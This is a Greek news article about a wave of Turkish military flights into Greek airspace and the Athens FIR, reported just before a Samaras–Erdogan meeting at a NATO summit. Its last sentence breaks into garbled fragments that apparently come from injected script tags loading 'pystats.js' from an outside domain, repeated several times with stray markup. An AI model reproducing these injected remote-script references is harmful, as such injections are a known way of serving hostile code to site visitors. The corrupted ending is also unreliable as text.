Τουρκικές προκλήσεις στο Αιγαίο πριν τη συνάντηση Σαμαρά-Ερντογάν

aeromaxies

Σε κύμα μαζικών παραβιάσεων του ελληνικού εναέριου χώρου στο Αιγαίο προέβησαν την Πέμπτη συνολικά 17 τουρκικά αεροσκάφη και ελικόπτερα που εισήλθαν χωρίς άδεια στο FIR Αθηνών.

Το μπαράζ των παραβιάσεων από τα 17 τουρκικά αεροσκάφη σημειώθηκε μόλις λίγες ώρες πριν την προγραμματισμένη για αύριο Παρασκευή συνάντηση του πρωθυπουργού Αντώνη Σαμαρά με τον πρόεδρο της Τουρκίας Ταγίπ Ερντογάν, που θα γίνει στην Ουαλία, στο περιθώριο της Συνόδου Κορυφής του ΝΑΤΟ.

Οκτώ αεροσκάφη ηλεκτρονικού πολέμου τύπου CN-235, πέντε τουρκικά ελικόπτερα και τέσσερα μαχητικά αεροσκάφη -δύο εκ των οποίων οπλισμένα- εισέβαλαν στο FIR Αθηνών και σημείωσαν 16 παραβάσεις των κανόνων εναέριας κυκλοφορίας και 27 παραβιάσεις του εθνικού εναέριου χώρου.

Οι πτήσεις των τουρκικών μαχητικών έγιναν στο βόρειο, το κεντρικό και το νοτιοανατολικό Αιγαίο.

Σύμφωνα με το ΓΕΕΘΑ «τα αεροσκάφη αναχαιτίστηκαν και αναγνωρίστηκαν σύμφωνα με τους διεθνείς κανόνες, κατά πάγια πρακτική».

Χαρακτηριστικό της κλιμάκωσεις της έντασης που επιχειρεί η Τουρκία όπως κάνει άλλωστε κάθε φορά που επίκειται καποιο γεγονός στα ελληνοτουρκικά είναι ότι τη Δευτέρα 1 Σεπτεμβρίου έβγαλαν στο Αιγαίο μόλις ένα πολεμικό αεροσκάφος, την Τρίτη 3 μαχητικά και 3 ελικόπτερα, χθες Τετάρτη 15 και σήμερα 17! challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >